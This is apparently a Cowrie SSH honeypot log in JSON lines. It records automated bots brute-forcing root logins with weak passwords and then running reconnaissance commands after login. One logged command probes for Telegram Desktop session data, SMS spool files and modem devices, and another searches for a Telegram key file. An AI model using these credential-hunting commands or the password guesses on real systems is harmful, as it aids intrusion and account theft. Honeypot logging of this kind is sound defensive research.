{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:14:00.750907Z","src_ip":"51.79.164.132","session":"4fb1cf164d6c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:14:00.751688Z","src_ip":"51.79.164.132","session":"4fb1cf164d6c"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:14:02.668521Z","src_ip":"51.79.164.132","session":"4fb1cf164d6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:03.216960Z","src_ip":"51.79.164.132","session":"4fb1cf164d6c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:14:03.217911Z","src_ip":"51.79.164.132","session":"4fb1cf164d6c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:03.833352Z","src_ip":"51.79.164.132","session":"4fb1cf164d6c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:03.834570Z","src_ip":"51.79.164.132","session":"4fb1cf164d6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29390,"dst_ip":"1.2.3.4","dst_port":22,"session":"72d60051d347","protocol":"ssh","message":"New connection: 212.227.125.160:29390 (1.2.3.4:22) [session: 72d60051d347]","sensor":"my-vps","timestamp":"2025-08-28T09:14:13.495417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:14:13.496891Z","src_ip":"212.227.125.160","session":"72d60051d347"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:13.681914Z","src_ip":"212.227.125.160","session":"72d60051d347"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50242,"dst_ip":"1.2.3.4","dst_port":22,"session":"c027caed7b94","protocol":"ssh","message":"New connection: 212.227.235.229:50242 (1.2.3.4:22) [session: c027caed7b94]","sensor":"my-vps","timestamp":"2025-08-28T09:14:20.147886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T09:14:20.150899Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-28T09:14:20.371014Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T09:14:21.983877Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51198,"dst_ip":"1.2.3.4","dst_port":22,"session":"10336cc102bf","protocol":"ssh","message":"New connection: 185.93.89.7:51198 (1.2.3.4:22) [session: 10336cc102bf]","sensor":"my-vps","timestamp":"2025-08-28T09:14:22.065568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:14:22.067460Z","src_ip":"185.93.89.7","session":"10336cc102bf"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:14:22.085420Z","src_ip":"185.93.89.7","session":"10336cc102bf"}
{"eventid":"cowrie.login.failed","username":"index","password":"121212","message":"login attempt [index/121212] failed","sensor":"my-vps","timestamp":"2025-08-28T09:14:22.123085Z","src_ip":"185.93.89.7","session":"10336cc102bf"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:23.141738Z","src_ip":"185.93.89.7","session":"10336cc102bf"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:14:23.239547Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:23.713017Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T09:14:23.713688Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T09:14:23.714057Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:23.936634Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:24.845720Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-28T09:14:24.846401Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:25.069472Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:25.526829Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T09:14:25.527539Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:25.750611Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:26.260983Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-28T09:14:26.261648Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":58784,"dst_ip":"1.2.3.4","dst_port":22,"session":"dacd8fd681f9","protocol":"ssh","message":"New connection: 51.79.164.132:58784 (1.2.3.4:22) [session: dacd8fd681f9]","sensor":"my-vps","timestamp":"2025-08-28T09:14:26.348508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:14:26.449708Z","src_ip":"51.79.164.132","session":"dacd8fd681f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:26.486266Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:27.004167Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T09:14:27.005010Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:14:27.090897Z","src_ip":"51.79.164.132","session":"dacd8fd681f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:27.242645Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:27.747442Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T09:14:27.748171Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:27.964386Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:28.467217Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-28T09:14:28.467900Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:14:28.576727Z","src_ip":"51.79.164.132","session":"dacd8fd681f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:28.694391Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:29.590978Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-28T09:14:29.591719Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:29.843972Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:30.049074Z","src_ip":"51.79.164.132","session":"dacd8fd681f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:14:30.304908Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-28T09:14:30.305578Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:30.523085Z","src_ip":"212.227.235.229","session":"c027caed7b94"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57266,"dst_ip":"1.2.3.4","dst_port":22,"session":"08b2a6f67dc8","protocol":"ssh","message":"New connection: 185.93.89.7:57266 (1.2.3.4:22) [session: 08b2a6f67dc8]","sensor":"my-vps","timestamp":"2025-08-28T09:14:48.147768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:14:48.149548Z","src_ip":"185.93.89.7","session":"08b2a6f67dc8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:14:48.178449Z","src_ip":"185.93.89.7","session":"08b2a6f67dc8"}
{"eventid":"cowrie.login.failed","username":"index","password":"zxcvbnm","message":"login attempt [index/zxcvbnm] failed","sensor":"my-vps","timestamp":"2025-08-28T09:14:48.216271Z","src_ip":"185.93.89.7","session":"08b2a6f67dc8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:14:49.282898Z","src_ip":"185.93.89.7","session":"08b2a6f67dc8"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":36838,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b7519188d30","protocol":"ssh","message":"New connection: 51.79.164.132:36838 (1.2.3.4:22) [session: 9b7519188d30]","sensor":"my-vps","timestamp":"2025-08-28T09:14:52.440663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:14:52.573719Z","src_ip":"51.79.164.132","session":"9b7519188d30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:14:53.060119Z","src_ip":"51.79.164.132","session":"9b7519188d30"}
